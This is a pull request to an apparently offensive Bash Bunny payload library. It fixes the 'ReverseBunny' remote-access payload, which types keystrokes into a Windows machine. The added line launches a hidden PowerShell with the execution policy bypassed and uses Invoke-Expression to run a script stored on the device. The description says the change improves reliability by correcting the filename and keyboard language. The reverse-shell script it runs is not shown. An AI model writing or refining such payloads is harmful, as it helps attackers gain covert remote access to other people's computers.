### PR TITLE
Fix ReverseBunny payload

### DIFF
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -10,7 +10,6 @@
 LED SETUP
 
 GET SWITCH_POSITION
-DUCKY_LANG de
 
 rm /root/udisk/DONE
 
@@ -20,18 +19,7 @@ ATTACKMODE HID STORAGE
 
 LED STAGE1
 
-DELAY 5000
-RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
-DELAY 6000
-
-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
-DELAY 10000
-Q ENTER
-DELAY 10000
-Q CONTROL v
-DELAY 10000
-Q ENTER
-DELAY 1000
+RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass \"iex((gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt')))\""
 
 LED STAGE2
 


### PR DESCRIPTION
Fixes a couple of problems in the ReverseBunny payload. Namely, the language (most computers will probably be EN, not DE) as well as changing `RevBunny.txt` to `ReverseBunny.txt` (the actual filename).

Also changes the method of execution from copy + pasting to Invoke-Expression.